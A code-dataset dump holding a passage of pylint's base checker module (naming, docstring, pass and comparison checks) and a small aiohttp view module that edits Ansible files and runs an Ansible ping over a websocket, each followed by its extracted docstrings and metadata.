if utils.overrides_a_method(node.parent.frame(), node.name):
return
confidence = (
interfaces.INFERENCE
if utils.has_known_bases(node.parent.frame())
else interfaces.INFERENCE_FAILURE
)
self._check_name(
_determine_function_name_type(node, config=self.config),
node.name,
node,
confidence,
)
# Check argument names
args = node.args.args
if args is not None:
self._recursive_check_names(args, node)
visit_asyncfunctiondef = visit_functiondef
@utils.check_messages("disallowed-name", "invalid-name", "non-ascii-name")
def visit_global(self, node):
for name in node.names:
self._check_name("const", name, node)
@utils.check_messages(
"disallowed-name", "invalid-name", "assign-to-new-keyword", "non-ascii-name"
)
def visit_assignname(self, node):
"""check module level assigned names"""
self._check_assign_to_new_keyword_violation(node.name, node)
frame = node.frame()
assign_type = node.assign_type()
if isinstance(assign_type, astroid.Comprehension):
self._check_name("inlinevar", node.name, node)
elif isinstance(frame, astroid.Module):
if isinstance(assign_type, astroid.Assign):
if isinstance(utils.safe_infer(assign_type.value), astroid.ClassDef):
self._check_name("class", node.name, node)
# Don't emit if the name redefines an import
# in an ImportError except handler.
elif not _redefines_import(node) and isinstance(
utils.safe_infer(assign_type.value), astroid.Const
):
self._check_name("const", node.name, node)
elif isinstance(assign_type, astroid.ExceptHandler):
self._check_name("variable", node.name, node)
elif isinstance(
assign_type, astroid.AnnAssign
) and utils.is_assign_name_annotated_with(node, "Final"):
self._check_name("const", node.name, node)
elif isinstance(frame, astroid.FunctionDef):
# global introduced variable aren't in the function locals
if node.name in frame and node.name not in frame.argnames():
if not _redefines_import(node):
self._check_name("variable", node.name, node)
elif isinstance(frame, astroid.ClassDef):
if not list(frame.local_attr_ancestors(node.name)):
for ancestor in frame.ancestors():
if (
ancestor.name == "Enum"
and ancestor.root().name == "enum"
or utils.is_assign_name_annotated_with(node, "Final")
):
self._check_name("class_const", node.name, node)
break
else:
self._check_name("class_attribute", node.name, node)
def _recursive_check_names(self, args, node):
"""check names in a possibly recursive list <arg>"""
for arg in args:
if isinstance(arg, astroid.AssignName):
self._check_name("argument", arg.name, node)
else:
self._recursive_check_names(arg.elts, node)
def _find_name_group(self, node_type):
return self._name_group.get(node_type, node_type)
def _raise_name_warning(
self, node, node_type, name, confidence, warning="invalid-name"
):
type_label = HUMAN_READABLE_TYPES[node_type]
hint = self._name_hints[node_type]
if self.config.include_naming_hint:
hint += " (%r pattern)" % self._name_regexps[node_type].pattern
args = (
(type_label.capitalize(), name, hint)
if warning == "invalid-name"
else (type_label.capitalize(), name)
)
self.add_message(warning, node=node, args=args, confidence=confidence)
self.stats["badname_" + node_type] += 1
def _name_allowed_by_regex(self, name: str) -> bool:
return name in self.config.good_names or any(
pattern.match(name) for pattern in self._good_names_rgxs_compiled
)
def _name_disallowed_by_regex(self, name: str) -> bool:
return name in self.config.bad_names or any(
pattern.match(name) for pattern in self._bad_names_rgxs_compiled
)
def _check_name(self, node_type, name, node, confidence=interfaces.HIGH):
"""check for a name using the type's regexp"""
non_ascii_match = self._non_ascii_rgx_compiled.match(name)
if non_ascii_match is not None:
self._raise_name_warning(
node, node_type, name, confidence, warning="non-ascii-name"
)
def _should_exempt_from_invalid_name(node):
if node_type == "variable":
inferred = utils.safe_infer(node)
if isinstance(inferred, astroid.ClassDef):
return True
return False
if utils.is_inside_except(node):
clobbering, _ = utils.clobber_in_except(node)
if clobbering:
return
if self._name_allowed_by_regex(name=name):
return
if self._name_disallowed_by_regex(name=name):
self.stats["badname_" + node_type] += 1
self.add_message("disallowed-name", node=node, args=name)
return
regexp = self._name_regexps[node_type]
match = regexp.match(name)
if _is_multi_naming_match(match, node_type, confidence):
name_group = self._find_name_group(node_type)
bad_name_group = self._bad_names.setdefault(name_group, {})
warnings = bad_name_group.setdefault(match.lastgroup, [])
warnings.append((node, node_type, name, confidence))
if match is None and not _should_exempt_from_invalid_name(node):
self._raise_name_warning(node, node_type, name, confidence)
def _check_assign_to_new_keyword_violation(self, name, node):
keyword_first_version = self._name_became_keyword_in_version(
name, self.KEYWORD_ONSET
)
if keyword_first_version is not None:
self.add_message(
"assign-to-new-keyword",
node=node,
args=(name, keyword_first_version),
confidence=interfaces.HIGH,
)
@staticmethod
def _name_became_keyword_in_version(name, rules):
for version, keywords in rules.items():
if name in keywords and sys.version_info < version:
return ".".join(str(v) for v in version)
return None
class DocStringChecker(_BasicChecker):
msgs = {
"C0112": (
"Empty %s docstring",
"empty-docstring",
"Used when a module, function, class or method has an empty "
"docstring (it would be too easy ;).",
{"old_names": [("W0132", "old-empty-docstring")]},
),
"C0114": (
"Missing module docstring",
"missing-module-docstring",
"Used when a module has no docstring."
"Empty modules do not require a docstring.",
{"old_names": [("C0111", "missing-docstring")]},
),
"C0115": (
"Missing class docstring",
"missing-class-docstring",
"Used when a class has no docstring."
"Even an empty class must have a docstring.",
{"old_names": [("C0111", "missing-docstring")]},
),
"C0116": (
"Missing function or method docstring",
"missing-function-docstring",
"Used when a function or method has no docstring."
"Some special methods like __init__ do not require a "
"docstring.",
{"old_names": [("C0111", "missing-docstring")]},
),
}
options = (
(
"no-docstring-rgx",
{
"default": NO_REQUIRED_DOC_RGX,
"type": "regexp",
"metavar": "<regexp>",
"help": "Regular expression which should only match "
"function or class names that do not require a "
"docstring.",
},
),
(
"docstring-min-length",
{
"default": -1,
"type": "int",
"metavar": "<int>",
"help": (
"Minimum line length for functions/classes that"
" require docstrings, shorter ones are exempt."
),
},
),
)
def open(self):
self.stats = self.linter.add_stats(
undocumented_module=0,
undocumented_function=0,
undocumented_method=0,
undocumented_class=0,
)
@utils.check_messages("missing-docstring", "empty-docstring")
def visit_module(self, node):
self._check_docstring("module", node)
@utils.check_messages("missing-docstring", "empty-docstring")
def visit_classdef(self, node):
if self.config.no_docstring_rgx.match(node.name) is None:
self._check_docstring("class", node)
@utils.check_messages("missing-docstring", "empty-docstring")
def visit_functiondef(self, node):
if self.config.no_docstring_rgx.match(node.name) is None:
ftype = "method" if node.is_method() else "function"
if (
is_property_setter(node)
or is_property_deleter(node)
or is_overload_stub(node)
):
return
if isinstance(node.parent.frame(), astroid.ClassDef):
overridden = False
confidence = (
interfaces.INFERENCE
if utils.has_known_bases(node.parent.frame())
else interfaces.INFERENCE_FAILURE
)
# check if node is from a method overridden by its ancestor
for ancestor in node.parent.frame().ancestors():
if node.name in ancestor and isinstance(
ancestor[node.name], astroid.FunctionDef
):
overridden = True
break
self._check_docstring(
ftype, node, report_missing=not overridden, confidence=confidence
)
elif isinstance(node.parent.frame(), astroid.Module):
self._check_docstring(ftype, node)
else:
return
visit_asyncfunctiondef = visit_functiondef
def _check_docstring(
self, node_type, node, report_missing=True, confidence=interfaces.HIGH
):
"""check the node has a non empty docstring"""
docstring = node.doc
if docstring is None:
docstring = _infer_dunder_doc_attribute(node)
if docstring is None:
if not report_missing:
return
lines = utils.get_node_last_lineno(node) - node.lineno
if node_type == "module" and not lines:
# If the module has no body, there's no reason
# to require a docstring.
return
max_lines = self.config.docstring_min_length
if node_type != "module" and max_lines > -1 and lines < max_lines:
return
self.stats["undocumented_" + node_type] += 1
if (
node.body
and isinstance(node.body[0], astroid.Expr)
and isinstance(node.body[0].value, astroid.Call)
):
# Most likely a string with a format call. Let's see.
func = utils.safe_infer(node.body[0].value.func)
if isinstance(func, astroid.BoundMethod) and isinstance(
func.bound, astroid.Instance
):
# Strings.
if func.bound.name in ("str", "unicode", "bytes"):
return
if node_type == "module":
message = "missing-module-docstring"
elif node_type == "class":
message = "missing-class-docstring"
else:
message = "missing-function-docstring"
self.add_message(message, node=node, confidence=confidence)
elif not docstring.strip():
self.stats["undocumented_" + node_type] += 1
self.add_message(
"empty-docstring", node=node, args=(node_type,), confidence=confidence
)
class PassChecker(_BasicChecker):
"""check if the pass statement is really necessary"""
msgs = {
"W0107": (
"Unnecessary pass statement",
"unnecessary-pass",
'Used when a "pass" statement that can be avoided is encountered.',
)
}
@utils.check_messages("unnecessary-pass")
def visit_pass(self, node):
if len(node.parent.child_sequence(node)) > 1 or (
isinstance(node.parent, (astroid.ClassDef, astroid.FunctionDef))
and (node.parent.doc is not None)
):
self.add_message("unnecessary-pass", node=node)
def _is_one_arg_pos_call(call):
"""Is this a call with exactly 1 argument,
where that argument is positional?
"""
return isinstance(call, astroid.Call) and len(call.args) == 1 and not call.keywords
def _infer_dunder_doc_attribute(node):
# Try to see if we have a `__doc__` attribute.
try:
docstring = node["__doc__"]
except KeyError:
return None
docstring = utils.safe_infer(docstring)
if not docstring:
return None
if not isinstance(docstring, astroid.Const):
return None
return docstring.value
class ComparisonChecker(_BasicChecker):
"""Checks for comparisons
- singleton comparison: 'expr == True', 'expr == False' and 'expr == None'
- yoda condition: 'const "comp" right' where comp can be '==', '!=', '<',
'<=', '>' or '>=', and right can be a variable, an attribute, a method or
a function
"""
msgs = {
"C0121": (
"Comparison %s should be %s",
"singleton-comparison",
"Used when an expression is compared to singleton "
"values like True, False or None.",
),
"C0122": (
"Comparison should be %s",
"misplaced-comparison-constant",
"Used when the constant is placed on the left side "
"of a comparison. It is usually clearer in intent to "
"place it in the right hand side of the comparison.",
),
"C0123": (
"Use isinstance() rather than type() for a typecheck.",
"unidiomatic-typecheck",
"The idiomatic way to perform an explicit typecheck in "
"Python is to use isinstance(x, Y) rather than "
"type(x) == Y, type(x) is Y. Though there are unusual "
"situations where these give different results.",
{"old_names": [("W0154", "old-unidiomatic-typecheck")]},
),
"R0123": (
"Comparison to literal",
"literal-comparison",
"Used when comparing an object to a literal, which is usually "
"what you do not want to do, since you can compare to a different "
"literal than what was expected altogether.",
),
"R0124": (
"Redundant comparison - %s",
"comparison-with-itself",
"Used when something is compared against itself.",
),
"W0143": (
"Comparing against a callable, did you omit the parenthesis?",
"comparison-with-callable",
"This message is emitted when pylint detects that a comparison with a "
"callable was made, which might suggest that some parenthesis were omitted, "
"resulting in potential unwanted behaviour.",
),
"W0177": (
"Comparison %s should be %s",
"nan-comparison",
"Used when an expression is compared to NaN"
"values like numpy.NaN and float('nan')",
),
}
def _check_singleton_comparison(
self, left_value, right_value, root_node, checking_for_absence: bool = False
):
"""Check if == or != is being used to compare a singleton value"""
singleton_values = (True, False, None)
def _is_singleton_const(node) -> bool:
return isinstance(node, astroid.Const) and any(
node.value is value for value in singleton_values
)
if _is_singleton_const(left_value):
singleton, other_value = left_value.value, right_value
elif _is_singleton_const(right_value):
singleton, other_value = right_value.value, left_value
else:
return
singleton_comparison_example = {False: "'{} is {}'", True: "'{} is not {}'"}
# True/False singletons have a special-cased message in case the user is
# mistakenly using == or != to check for truthiness
if singleton in (True, False):
suggestion_template = (
"{} if checking for the singleton value {}, or {} if testing for {}"
)
truthiness_example = {False: "not {}", True: "{}"}
truthiness_phrase = {True: "truthiness", False: "falsiness"}
# Looks for comparisons like x == True or x != False
checking_truthiness = singleton is not checking_for_absence
suggestion = suggestion_template.format(
singleton_comparison_example[checking_for_absence].format(
left_value.as_string(), right_value.as_string()
),
singleton,
(
"'bool({})'"
if not utils.is_test_condition(root_node) and checking_truthiness
else "'{}'"
).format(
truthiness_example[checking_truthiness].format(
other_value.as_string()
)
),
truthiness_phrase[checking_truthiness],
)
else:
suggestion = singleton_comparison_example[checking_for_absence].format(
left_value.as_string(), right_value.as_string()
)
self.add_message(
"singleton-comparison",
node=root_node,
args=(f"'{root_node.as_string()}'", suggestion),
)
def _check_nan_comparison(
self, left_value, right_value, root_node, checking_for_absence: bool = False
):
def _is_float_nan(node):
try:
if isinstance(node, astroid.Call) and len(node.args) == 1:
if (
node.args[0].value.lower() == "nan"
and node.inferred()[0].pytype() == "builtins.float"
):
return True
return False
except AttributeError:
return False
def _is_numpy_nan(node):
if isinstance(node, astroid.Attribute) and node.attrname == "NaN":
if isinstance(node.expr, astroid.Name):
return node.expr.name in ("numpy", "nmp", "np")
return False
def _is_nan(node) -> bool:
return _is_float_nan(node) or _is_numpy_nan(node)
nan_left = _is_nan(left_value)
if not nan_left and not _is_nan(right_value):
return
absence_text = ""
if checking_for_absence:
absence_text = "not "
if nan_left:
suggestion = f"'{absence_text}math.isnan({right_value.as_string()})'"
else:
suggestion = f"'{absence_text}math.isnan({left_value.as_string()})'"
self.add_message(
"nan-comparison",
node=root_node,
args=(f"'{root_node.as_string()}'", suggestion),
)
def _check_literal_comparison(self, literal, node):
"""Check if we compare to a literal, which is usually what we do not want to do."""
nodes = (astroid.List, astroid.Tuple, astroid.Dict, astroid.Set)
is_other_literal = isinstance(literal, nodes)
is_const = False
if isinstance(literal, astroid.Const):
if isinstance(literal.value, bool) or literal.value is None:
# Not interested in this values.
return
is_const = isinstance(literal.value, (bytes, str, int, float))
if is_const or is_other_literal:
self.add_message("literal-comparison", node=node)
def _check_misplaced_constant(self, node, left, right, operator):
if isinstance(right, astroid.Const):
return
operator = REVERSED_COMPS.get(operator, operator)
suggestion = f"{right.as_string()} {operator} {left.value!r}"
self.add_message("misplaced-comparison-constant", node=node, args=(suggestion,))
def _check_logical_tautology(self, node):
"""Check if identifier is compared against itself.
:param node: Compare node
:type node: astroid.node_classes.Compare
:Example:
val = 786
if val == val: # [comparison-with-itself]
pass
"""
left_operand = node.left
right_operand = node.ops[0][1]
operator = node.ops[0][0]
if isinstance(left_operand, astroid.Const) and isinstance(
right_operand, astroid.Const
):
left_operand = left_operand.value
right_operand = right_operand.value
elif isinstance(left_operand, astroid.Name) and isinstance(
right_operand, astroid.Name
):
left_operand = left_operand.name
right_operand = right_operand.name
if left_operand == right_operand:
suggestion = f"{left_operand} {operator} {right_operand}"
self.add_message("comparison-with-itself", node=node, args=(suggestion,))
def _check_callable_comparison(self, node):
operator = node.ops[0][0]
if operator not in COMPARISON_OPERATORS:
return
bare_callables = (astroid.FunctionDef, astroid.BoundMethod)
left_operand, right_operand = node.left, node.ops[0][1]
# this message should be emitted only when there is comparison of bare callable
# with non bare callable.
if (
sum(
1
for operand in (left_operand, right_operand)
if isinstance(utils.safe_infer(operand), bare_callables)
)
== 1
):
self.add_message("comparison-with-callable", node=node)
@utils.check_messages(
"singleton-comparison",
"misplaced-comparison-constant",
"unidiomatic-typecheck",
"literal-comparison",
"comparison-with-itself",
"comparison-with-callable",
)
def visit_compare(self, node):
self._check_callable_comparison(node)
self._check_logical_tautology(node)
self._check_unidiomatic_typecheck(node)
# NOTE: this checker only works with binary comparisons like 'x == 42'
# but not 'x == y == 42'
if len(node.ops) != 1:
return
left = node.left
operator, right = node.ops[0]
if operator in COMPARISON_OPERATORS and isinstance(left, astroid.Const):
self._check_misplaced_constant(node, left, right, operator)
if operator in ("==", "!="):
self._check_singleton_comparison(
left, right, node, checking_for_absence=operator == "!="
)
if operator in ("==", "!=", "is", "is not"):
self._check_nan_comparison(
left, right, node, checking_for_absence=operator in ("!=", "is not")
)
if operator in ("is", "is not"):
self._check_literal_comparison(right, node)
def _check_unidiomatic_typecheck(self, node):
operator, right = node.ops[0]
if operator in TYPECHECK_COMPARISON_OPERATORS:
left = node.left
if _is_one_arg_pos_call(left):
self._check_type_x_is_y(node, left, operator, right)
def _check_type_x_is_y(self, node, left, operator, right):
"""Check for expressions like type(x) == Y."""
left_func = utils.safe_infer(left.func)
if not (
isinstance(left_func, astroid.ClassDef) and left_func.qname() == TYPE_QNAME
):
return
if operator in ("is", "is not") and _is_one_arg_pos_call(right):
right_func = utils.safe_infer(right.func)
if (
isinstance(right_func, astroid.ClassDef)
and right_func.qname() == TYPE_QNAME
):
# type(x) == type(a)
right_arg = utils.safe_infer(right.args[0])
if not isinstance(right_arg, LITERAL_NODE_TYPES):
# not e.g. type(x) == type([])
return
self.add_message("unidiomatic-typecheck", node=node)
def register(linter):
"""required method to auto register this checker"""
linter.register_checker(BasicErrorChecker(linter))
linter.register_checker(BasicChecker(linter))
linter.register_checker(NameChecker(linter))
linter.register_checker(DocStringChecker(linter))
linter.register_checker(PassChecker(linter))
linter.register_checker(ComparisonChecker(linter))
| venv/lib/python3.8/site-packages/pylint/checkers/base.py | 100,471 | checks for :
* doc strings
* number of arguments, local variables, branches, returns and statements in
functions, methods
* required module attributes
* dangerous default values as arguments
* redefinition of function / method / class
* uses of the global statement
Regex rules for camelCase naming style.
Checks for comparisons
- singleton comparison: 'expr == True', 'expr == False' and 'expr == None'
- yoda condition: 'const "comp" right' where comp can be '==', '!=', '<',
'<=', '>' or '>=', and right can be a variable, an attribute, a method or
a function
It may seem counterintuitive that single naming style has multiple "accepted"
forms of regular expressions, but we need to special-case stuff like dunder names
in method names.
Regex rules for PascalCase naming style.
check if the pass statement is really necessary
Regex rules for snake_case naming style.
Regex rules for UPPER_CASE naming style.
Check for dangerous default values as arguments.
check the node has a non empty docstring
Check that any loop with an else clause has a break statement.
check that a node is inside a for or while loop
Check if we compare to a literal, which is usually what we do not want to do.
Check if identifier is compared against itself.
:param node: Compare node
:type node: astroid.node_classes.Compare
:Example:
val = 786
if val == val: # [comparison-with-itself]
pass
check for a name using the type's regexp
Check that a name is both nonlocal and global.
check that a node is not inside a finally clause of a
try...finally statement.
If we found before a try...finally bloc a parent which its type is
in breaker_classes, we skip the whole check.
check for redefinition of a function / method / class name
check that the argument to `reversed` is a sequence
Check if == or != is being used to compare a singleton value
Check for expressions like type(x) == Y.
check unreachable code
Determine the name type whose regex the a function's name should match.
:param node: A function node.
:param config: Configuration from which to pull additional property classes.
:type config: :class:`optparse.Values`
:returns: One of ('function', 'method', 'attr')
:rtype: str
Returns the loop node that holds the break node in arguments.
Args:
break_node (astroid.Break): the break node of interest.
Returns:
astroid.For or astroid.While: the loop node holding the break node.
Returns a tuple of property classes and names.
Property classes are fully qualified, such as 'abc.abstractproperty' and
property names are the actual names, such as 'abstract_property'.
Determine if the given `node` has abstract methods.
The methods should be made abstract by decorating them
with `abc` decorators.
Is this a call with exactly 1 argument,
where that argument is positional?
Returns true if a loop may ends up in a break statement.
Args:
loop (astroid.For, astroid.While): the loop node inspected.
Returns:
bool: True if the loop may ends up in a break statement, False otherwise.
check names in a possibly recursive list <arg>
Detect that the given node (AssignName) is inside an
exception handler and redefines an import from the tryexcept body.
Returns True if the node redefines an import, False otherwise.
return True if the node is inside a kind of for loop
return true if the object is an element of <nested_list> or of a nested
list
update try...finally flag
initialize visit variables and statistics
return True if the object is a method redefined via decorator.
For example:
@property
def x(self): return self._x
@x.setter
def x(self, value): self._x = value
required method to auto register this checker
make a report of
* percentage of different types documented
* percentage of different types with a bad name
check whether assert is used on a tuple or string literal.
check module level assigned names
1 - check is the node has a right sibling (if so, that's some
unreachable code)
2 - check is the node is inside the finally clause of a try...finally
block
Check instantiating abstract class with
abc.ABCMeta as metaclass.
visit a Call node -> check if this is not a disallowed builtin
call and check for * or ** use
check module name, docstring and redefinition
increment branch counter
check is the node has a right sibling (if so, that's some unreachable
code)
check duplicate key in dictionary
just print a warning on exec statements
Check for various kind of statements without effect
check function name, docstring, arguments, redefinition,
variable names, max locals
check whether or not the lambda is suspicious
check module name, docstring and required arguments
check if the node has a right sibling (if so, that's some unreachable
code)
1 - check is the node has a right sibling (if so, that's some
unreachable code)
2 - check is the node is inside the finally clause of a try...finally
block
Check that a Starred expression is used in an assignment target.
update try...finally flag
check use of the non-existent ++ and -- operator operator
basic checker for Python code
Copyright (c) 2006-2016 LOGILAB S.A. (Paris, FRANCE) <contact@logilab.fr> Copyright (c) 2010 Daniel Harding <dharding@gmail.com> Copyright (c) 2012-2014 Google, Inc. Copyright (c) 2013-2020 Claudiu Popa <pcmanticore@gmail.com> Copyright (c) 2014 Brett Cannon <brett@python.org> Copyright (c) 2014 Arun Persaud <arun@nubati.net> Copyright (c) 2015 Nick Bastin <nick.bastin@gmail.com> Copyright (c) 2015 Michael Kefeder <oss@multiwave.ch> Copyright (c) 2015 Dmitry Pribysh <dmand@yandex.ru> Copyright (c) 2015 Stephane Wirtel <stephane@wirtel.be> Copyright (c) 2015 Cosmin Poieana <cmin@ropython.org> Copyright (c) 2015 Florian Bruhin <me@the-compiler.org> Copyright (c) 2015 Radu Ciorba <radu@devrandom.ro> Copyright (c) 2015 Ionel Cristian Maries <contact@ionelmc.ro> Copyright (c) 2016, 2019 Ashley Whetter <ashley@awhetter.co.uk> Copyright (c) 2016, 2018 Jakub Wilk <jwilk@jwilk.net> Copyright (c) 2016-2017 Łukasz Rogalski <rogalski.91@gmail.com> Copyright (c) 2016 Glenn Matthews <glenn@e-dad.net> Copyright (c) 2016 Elias Dorneles <eliasdorneles@gmail.com> Copyright (c) 2016 Yannack <yannack@users.noreply.github.com> Copyright (c) 2016 Alex Jurkiewicz <alex@jurkiewi.cz> Copyright (c) 2017, 2019-2021 Pierre Sassoulas <pierre.sassoulas@gmail.com> Copyright (c) 2017, 2019-2021 hippo91 <guillaume.peillex@gmail.com> Copyright (c) 2017 danields <danields761@gmail.com> Copyright (c) 2017 Jacques Kvam <jwkvam@gmail.com> Copyright (c) 2017 ttenhoeve-aa <ttenhoeve@appannie.com> Copyright (c) 2018-2019 Nick Drozd <nicholasdrozd@gmail.com> Copyright (c) 2018-2019 Ville Skyttä <ville.skytta@iki.fi> Copyright (c) 2018 Sergei Lebedev <185856+superbobry@users.noreply.github.com> Copyright (c) 2018 Lucas Cimon <lucas.cimon@gmail.com> Copyright (c) 2018 ssolanki <sushobhitsolanki@gmail.com> Copyright (c) 2018 Natalie Serebryakova <natalie.serebryakova@Natalies-MacBook-Pro.local> Copyright (c) 2018 Sushobhit <31987769+sushobhit27@users.noreply.github.com> Copyright (c) 2018 SergeyKosarchuk <sergeykosarchuk@gmail.com> Copyright (c) 2018 Steven M. Vascellaro <svascellaro@gmail.com> Copyright (c) 2018 Mike Frysinger <vapier@gmail.com> Copyright (c) 2018 Chris Lamb <chris@chris-lamb.co.uk> Copyright (c) 2018 glmdgrielson <32415403+glmdgrielson@users.noreply.github.com> Copyright (c) 2019 Daniel Draper <Germandrummer92@users.noreply.github.com> Copyright (c) 2019 Hugo van Kemenade <hugovk@users.noreply.github.com> Copyright (c) 2019 Niko Wenselowski <niko@nerdno.de> Copyright (c) 2019 Nikita Sobolev <mail@sobolevn.me> Copyright (c) 2019 Oisín Moran <OisinMoran@users.noreply.github.com> Copyright (c) 2019 Fantix King <fantix@uchicago.edu> Copyright (c) 2020 Peter Kolbus <peter.kolbus@gmail.com> Copyright (c) 2020 ethan-leba <ethanleba5@gmail.com> Copyright (c) 2020 へーさん <hira9603859504@gmail.com> Copyright (c) 2020 Damien Baty <damien.baty@polyconseil.fr> Copyright (c) 2020 Ram Rachum <ram@rachum.com> Copyright (c) 2020 Anthony Sottile <asottile@umich.edu> Copyright (c) 2020 bernie gray <bfgray3@users.noreply.github.com> Copyright (c) 2020 Gabriel R Sezefredo <g@briel.dev> Copyright (c) 2020 Benny <benny.mueller91@gmail.com> Copyright (c) 2020 Anubhav <35621759+anubh-v@users.noreply.github.com> Copyright (c) 2021 Marc Mueller <30130371+cdce8p@users.noreply.github.com> Copyright (c) 2021 Andreas Finkler <andi.finkler@gmail.com> Copyright (c) 2021 Or Bahari <orbahari@mail.tau.ac.il> Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html For details: https://github.com/PyCQA/pylint/blob/master/LICENSE do not require a doc string on private/system methods Python 3.7+, Name categories that are always consistent with all naming conventions. A mapping from qname -> symbol, to be used when generating messages about dangerous default values as arguments List of methods which can be redefined Not returning 'property', it has its own check. If the function is decorated using the prop_method.{setter,getter} form, treat it like an attribute as well. If the function is a property (decorated with @property or @abc.abstractproperty), the name type is 'attr'. percentage of different types documented and/or with a bad name Check *a, *b = ... Check *a = b f(*args) is converted to Call(args=[Starred]), so ignore them for this check. PEP 448 unpacking. checks for max returns, branch, return in __init__ Are we returning anything but None from constructors Check for duplicate names by clustering args with same name for detailed report provide detailed report about each repeated argument Okay, found it. Don't emit the warning if the class is instantiated in its own body or if the call is not an instance creation. If the class is instantiated into its own body, we're expecting that it knows what it is doing. __init__ was called Python 3.4 has `abc.ABC`, which won't be detected by ClassNode.metaclass() This is not optimal, but the line previous to the first statement in the else clause will usually be the one that contains the else:. Ignore function stubs created for type information Additional checks for methods which are not considered redefined, since they are already part of the base API. Skip typing.overload() functions. Exempt functions redefined on a condition. Exempt "if not <func>" cases Exempt "if <func> is not None" cases pylint: disable=too-many-boolean-expressions Check if we have forward references for this node. These nodes are excepted, since they are not constant values, requiring a computation to happen. If the constant node is a FunctionDef or Lambda then it may be a illicit function call due to missing parentheses pylint: disable=unused-argument treat string statement in a separated message Handle PEP-257 attribute docstrings. An attribute docstring is defined as being a string right after an assignment at the module level, class level or __init__ level. Ignore if this is : * a direct function call * the unique child of a try/except body * a yield statement * an ellipsis (which can be used on Python 3 instead of pass) warn W0106 if we have any underlying function call (we can't predict side effects), else pointless-statement Return the arguments for the given call which are not passed as vararg. if the body of the lambda is a call expression with the same argument list as the lambda itself, then the lambda is possibly unnecessary and at least suspicious. If the arguments of the lambda include defaults, then a judgment cannot be made because there is no way to check that the defaults defined by the lambda are the same as the defaults defined by the function called in the body of the lambda. The body of the lambda must be a function call expression for the lambda to be unnecessary. Chained call, the intermediate call might return something else (but we don't check that, yet). Look for additional keyword arguments that are not part of the lambda's signature Different lengths, so probably not identical The "ordinary" arguments must be in a correspondence such that: ordinary_args[i].name == call.args[i].name. We are here in the following situation(s): * a dict/set/list/tuple call which wasn't inferred to a syntax node ({}, () etc.). This can happen when the arguments are invalid or unknown to the inference. * a variable from somewhere else, which turns out to be a list or a dict. this argument is a name Is it inside final body of a try...finally bloc ? 1 - Is it right sibling ? 2 - Is it inside final body of a try...finally bloc ? we are doubtful on inferred type of node, so here just check if format was called on print() ignore the name if it's not a builtin (i.e. not defined in the locals nor globals scope) pylint: disable=unused-argument if self._tryfinallys is empty, we're not an in try...finally block the node could be a grand-grand...-children of the try...finally Nothing was inferred. Try to see if we have iter(). Mappings aren't accepted by reversed(), unless they provide explicitly a __reversed__ method. everything else is not a proper sequence for reversed() a "with" statement with multiple managers corresponds to one AST "With" node with multiple items Don't emit a message if the second is a function call there's no way that can be mistaken for a name assignment. If the line number doesn't match we assume it's a nested "with". Detect assigning to the same variable. A complex assignment, so bail out early. Unpacking a variable into the same name. Check that the scope is different than a class level, which is usually a pattern to expose module level attributes as class level ones. pylint: disable=unused-argument Do not emit any warnings if the method is just an implementation of a base class method. Check argument names Don't emit if the name redefines an import in an ImportError except handler. global introduced variable aren't in the function locals check if node is from a method overridden by its ancestor If the module has no body, there's no reason to require a docstring. Most likely a string with a format call. Let's see. Strings. Try to see if we have a `__doc__` attribute. True/False singletons have a special-cased message in case the user is mistakenly using == or != to check for truthiness Looks for comparisons like x == True or x != False Not interested in this values. this message should be emitted only when there is comparison of bare callable with non bare callable. NOTE: this checker only works with binary comparisons like 'x == 42' but not 'x == y == 42' type(x) == type(a) not e.g. type(x) == type([]) | 14,537 | en | 0.737427 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
# @Time : 2020-01-16 15:53
# @Author : 行颠
# @Email : 0xe590b4@gmail.com
# @File : view
# @Software: view
# @DATA : 2020-01-16
"""
import os
import asyncio
import motor.motor_asyncio
import aiohttp
from aiohttp import web
import aiohttp_jinja2
import json
import jinja2
from apps.config import *
import subprocess, shlex
from apps.ansible_config import get_ansible_hosts_data
@aiohttp_jinja2.template('package/package.html')
async def handler_package(request):
return {'name': 'Andrew', 'age': 'Svetlov'}
@aiohttp_jinja2.template('package/workflow.html')
async def handler_package_workflow(request):
return {'name': 'Andrew', 'age': 'Svetlov'}
async def handler_package_workflow_roles(request):
post = await request.post()
result = read_yaml_file(post['path'])
roles = result[0]['roles']
return web.json_response(roles)
async def handler_package_ansible_list(request):
dir_path = request.app['settings'].ansible_package_workspace
result = get_tree(dir_path)
return web.json_response(result)
async def handler_package_ansible_read(request):
post = await request.post()
data = read_t_file(post['filename'])
return web.json_response({"code": 1, "data": data})
async def handler_package_ansible_write(request):
post = await request.post()
data = write_t_file(post['path'], post['code'])
return web.json_response({"code": 1, "data": data})
async def handler_package_ws_ansible_run(request):
ws = web.WebSocketResponse()
cmdb = request.app['cmdb']
await ws.prepare(request)
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close':
await ws.close()
else:
msg_data = json.loads(msg.data)
params = []
query_data = json.loads(msg_data['query'])
for i in query_data['nodeDataArray']:
if i.get("role", None) and i.get("data", None):
params.append(i.get("data"))
await ws.send_str(">> {} \r\n".format(json.dumps({"$or": params})))
# await ws.send_json({"$or":params})
import pprint
pprint.pprint({"$or": params})
result = cmdb.assets.find({"$or": params})
hosts = []
for host in await result.to_list(length=1000):
hosts.append(host)
hosts_file = get_ansible_hosts_data(hosts)
work_path = os.path.dirname(os.path.abspath(msg_data['path']))
command = "ansible -i {} all -m ping".format(hosts_file)
await ws.send_str(">> {} \r\n".format(command))
await ws.send_str(">> {} \r\n".format("result:"))
import time
time.sleep(1)
p = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, cwd=work_path)
# 实时获取输出
while p.poll() == None:
out = p.stdout.readline().strip()
err = p.stderr
if err:
# print("sub process err: ", err)
await ws.send_str(err.decode(encoding='utf-8', errors='strict'))
if out:
# print("sub process output: ", out)
await ws.send_str(out.decode(encoding='utf-8', errors='strict'))
# 子进程返回值
await ws.send_str("return code: {} ".format(p.returncode))
return ws
| apps/package/view.py | 3,727 | # @Time : 2020-01-16 15:53
# @Author : 行颠
# @Email : 0xe590b4@gmail.com
# @File : view
# @Software: view
# @DATA : 2020-01-16
!/usr/bin/python3 -*- coding: utf-8 -*- await ws.send_json({"$or":params}) 实时获取输出 print("sub process err: ", err) print("sub process output: ", out) 子进程返回值 | 295 | en | 0.270924 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Models for storing inactive and deprecated tables from the CAL-ACCESS database.
"""
